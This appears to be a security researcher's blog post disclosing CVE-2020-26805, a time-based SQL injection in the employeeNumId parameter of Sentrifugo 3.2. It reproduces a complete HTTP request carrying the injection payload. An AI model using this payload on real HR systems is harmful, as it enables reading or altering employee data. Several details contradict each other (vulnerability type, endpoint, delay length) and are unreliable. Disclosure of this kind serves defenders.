Posts Sentrifugo 3.2 | SQLi [employeeNumId] parameter | CVE-2020-26805
Post
Cancel

Sentrifugo 3.2 | SQLi [employeeNumId] parameter | CVE-2020-26805

Oct 6, 2020 2020-10-06T11:33:00+08:00 by Fatih Çelik
1 min

Software: https://sourceforge.net/projects/sentrifugo/

Version: 3.2

Vulnerability: Unrestricted File Upload

CVE: CVE-2020-26805

Sentrifugo is a FREE and powerful Human Resource Management System that can be easily configured to meet your organizational needs… Sentrifugo makes your organization’s HR process easier. It is packed with HR essential modules like Appraisal, Time Management, Leave Management, Employee Management, Analytics, Hiring/Recruitment, Background Check, Service Desk and much more.Sentrifugo furnishes a complete HRM solution facilitating a strategic and comprehensive approach to manage people and the workplace, thus enabling the employee(s) to contribute effectively and productively towards the organization’s goals. Sentrifugo is the only solution you’ll need for managing HR processes. It offers a host of adaptable features to meet the needs of both managers and employees.

Reference:  https://sourceforge.net/projects/sentrifugo/

Vulnerability Description:

In Sentrifugo web application, admin can edit employee’s informations via this endpoint —> sentrifugo/index.php/empadditionaldetails/edit/userid/2. In this POST request, employeeNumId parameter is affected by SQLi vulnerability. Attacker can inject SQL commands into query, read data from database or write data into the database. If you send the below request, you will get the response approximately 5 seconds after because of the SLEEP command.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

POST /sentrifugo/index.php/employee/edit/id/2 HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 421
Origin: http://192.168.1.6
Connection: close
Referer: http://192.168.1.6/sentrifugo/index.php/employee/edit/id/2
Cookie: PHPSESSID=4p9aptkj3tg0kp675mtaf9d02v
Upgrade-Insecure-Requests: 1

tmp_emp_name=&act_inact=0&id=2&user_id=2&final_emp_id=EMPP1&id=2&user_id=2&employeeId=EMPP&employeeNumId=1' AND (SELECT 6376 FROM (SELECT(SLEEP(1)))WoTp) AND 'qstJ'='qstJ&prefix_id=&firstname=adas&lastname=asdasd&hid_modeofentry=Direct&disp_requi=&emprole=2&emailaddress=asdasd%40tasd.com&jobtitle_id=&position_id=&date_of_joining=2020%2F10%2F13&years_exp=&office_number=&extension_number=&office_faxnumber=&submit=Update

Payload,

1

employeeNumId=1' AND (SELECT 6376 FROM (SELECT(SLEEP(1)))WoTp) AND 'qstJ'='qstJ
Vulnerability Research
vulnerability research
This post is licensed under CC BY 4.0 by the author.
Recent Update
Contents

Sentrifugo 3.2 | RCE [Authenticated] (assets) | CVE-2020-26803

Group Office CRM | SSRF